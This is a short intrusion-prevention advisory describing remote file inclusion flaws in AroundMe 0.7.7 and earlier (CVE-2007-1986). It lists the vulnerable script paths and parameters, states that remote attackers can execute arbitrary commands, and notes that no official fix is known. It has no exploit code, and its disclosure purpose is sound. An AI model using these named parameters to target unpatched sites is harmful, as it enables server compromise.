Intrusion Prevention

AroundMe.Multiple.Remote.File.Inclusion

Description

This indicates multiple file inclusion vulnerabilities in AroundMe. They are due to input validation errors in the "components/core/inc/core_profile.header.php", "components/core/template/barnraiser_01/maint_contact_view.tpl.php", and "components/core/template/barnraiser_01/default.tpl.php" scripts when processing the "language_path_core", "template_path_core" and "template_path" parameters. The vulnerabilities allow remote attackers to include malicious scripts and execute arbitrary commands with the privileges of the web server.

Affected Products

AROUNDMe version 0.7.7 and prior.

Impact

System compromise.

Recommended Actions

Currently we are not aware of any official supplied fix for issue.
Vendor's web site:http://www.barnraiser.org/

CVE References

CVE-2007-1986